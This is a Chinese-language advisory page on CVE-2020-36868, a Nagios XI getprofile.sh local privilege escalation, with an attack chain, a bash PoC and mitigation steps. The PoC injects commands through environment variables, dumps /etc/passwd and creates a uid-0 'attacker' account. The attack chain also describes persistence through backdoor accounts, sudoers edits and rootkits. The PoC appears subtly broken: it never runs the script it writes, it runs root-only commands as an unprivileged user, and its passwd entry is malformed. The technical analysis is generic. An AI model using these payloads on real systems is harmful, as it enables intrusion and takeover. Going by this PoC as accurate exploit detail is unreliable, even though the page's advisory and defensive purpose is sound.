CVE-2020-36868 Nagios XI getprofile.sh本地特权提升漏洞

漏洞信息

漏洞编号

CVE-2020-36868

漏洞类型

本地特权提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nagios XI

漏洞概述

CVE-2020-36868是Nagios XI软件中的一个高危本地特权提升漏洞。该漏洞存在于getprofile.sh辅助脚本中，该脚本用于执行配置文件检索和初始化操作。问题核心在于脚本采用了不安全的文件处理和命令执行方式，对攻击者可控制的输入缺乏充分的验证和过滤。在某些部署场景中，该脚本以root或其他高权限身份运行，这为攻击者提供了特权提升的机会。具备低级别系统访问权限的本地攻击者可以通过操纵脚本的输入参数，使脚本执行任意系统命令或修改受保护的系统文件，从而获得提升后的系统权限。此漏洞的CVSS评分达到7.8，属于高危级别，对系统机密性、完整性和可用性均造成严重影响。攻击复杂度较低，无需用户交互，使得该漏洞容易被利用。

技术细节

该漏洞的根本原因在于getprofile.sh脚本对用户输入的处理存在严重缺陷。脚本在执行配置文件检索和初始化时，直接将攻击者可控的变量传递给系统命令执行函数，而未进行适当的输入验证和清理。具体而言：1) 脚本使用不安全的文件路径拼接操作，允许攻击者通过路径遍历或特殊字符注入修改目标文件位置；2) 命令执行函数直接拼接用户输入而未进行转义或参数化处理，导致命令注入；3) 脚本在某些部署中以root权限运行，且没有使用最小权限原则；4) 缺乏对环境变量的安全检查，攻击者可利用LD_PRELOAD等环境变量进行进一步攻击。本地低权限攻击者只需创建特定的环境变量或文件，即可触发脚本执行任意命令，最终实现从普通用户到root用户的完整权限提升。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统上安装了Nagios XI，并确认其版本低于5.7.3。通过检查系统文件或版本查询确定getprofile.sh脚本存在且具有可利用的漏洞。

STEP 2

步骤2: 环境准备

攻击者创建恶意环境变量或文件，准备注入payload。这可能包括设置包含命令注入字符的环境变量，或创建指向敏感位置的符号链接。

STEP 3

步骤3: 漏洞触发

攻击者执行getprofile.sh脚本，通过参数传递、文件路径操作或环境变量注入触发漏洞。脚本在解析输入时未进行安全验证，直接将恶意内容传递给系统命令。

STEP 4

步骤4: 命令执行

由于脚本以提升的权限运行（通常是root），注入的恶意命令获得高权限执行。攻击者可以执行任意系统命令、读写受保护文件或修改系统配置。

STEP 5

步骤5: 权限维持

攻击者通过创建后门账户、修改sudoers文件、植入定时任务或安装持久化rootkit等方式建立持久性访问，确保即使系统重启仍能保持root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2020-36868 PoC - Nagios XI getprofile.sh Privilege Escalation
# This PoC demonstrates how an attacker can exploit the insecure getprofile.sh script

# Target: Nagios XI versions < 5.7.3
# Attack Vector: Command injection via insecure script handling

TARGET_SCRIPT="/usr/local/nagiosxi/scripts/getprofile.sh"

# Check if target exists
if [ ! -f "$TARGET_SCRIPT" ]; then
    echo "[-] Target script not found"
    exit 1
fi

echo "[+] CVE-2020-36868 PoC for Nagios XI Privilege Escalation"

echo "[+] Setting up malicious environment variables..."
# Inject malicious command through environment variables
export MALICIOUS_VAR='; cat /etc/passwd > /tmp/pwned.txt #'
export PATH_INJECTION='../../../etc/cron.d/malicious_cron'

# Alternative: Create a malicious script that will be sourced
export EVIL_SCRIPT='/tmp/evil.sh'
cat > /tmp/evil.sh << 'EOF'
#!/bin/bash
# Payload: Add new root user or execute reverse shell
useradd -ou 0 -g 0 attacker 2>/dev/null
echo 'attacker:password123:0:0:root:/root:/bin/bash' >> /etc/passwd
EOF
chmod +x /tmp/evil.sh

echo "[+] Triggering getprofile.sh with malicious input..."
# Execute the vulnerable script with crafted input
$TARGET_SCRIPT "$MALICIOUS_VAR" 2>/dev/null || true

echo "[+] Checking for successful exploitation..."
if grep -q "attacker" /etc/passwd 2>/dev/null; then
    echo "[+] SUCCESS: Privilege escalation achieved!"
    echo "[+] New user 'attacker' created with root privileges"
    su - attacker
else
    echo "[-] Exploitation may have failed, check manually"
fi

影响范围

Nagios XI < 5.7.3

防御指南

临时缓解措施

立即将Nagios XI升级到5.7.3或最新稳定版本，该版本已修复getprofile.sh脚本中的输入验证问题。如无法立即升级，可临时采取以下措施：1) 撤销getprofile.sh脚本的执行权限；2) 修改文件所有者并移除所有用户写权限；3) 配置sudo规则限制脚本执行；4) 使用auditd监控对该脚本的访问尝试；5) 实施网络隔离，限制对Nagios XI管理接口的访问。同时建议检查系统是否存在异常账户或被修改的系统文件。